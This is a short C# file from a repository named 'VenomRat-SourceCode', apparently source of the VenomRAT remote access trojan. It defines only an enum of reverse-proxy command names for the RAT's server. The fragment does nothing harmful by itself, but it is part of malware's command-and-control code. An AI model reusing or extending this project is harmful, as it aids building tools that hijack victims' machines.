VenomRat-SourceCode/ReverseProxy/ReverseProxyCommands.cs
2023-07-29 23:37:10 +05:30

11 lines
133 B
C#

namespace Server.ReverseProxy;
public enum ReverseProxyCommands
{
CONNECT,
CONNECTRESPONSE,
DATA,
DISCONNECT,
INIT
}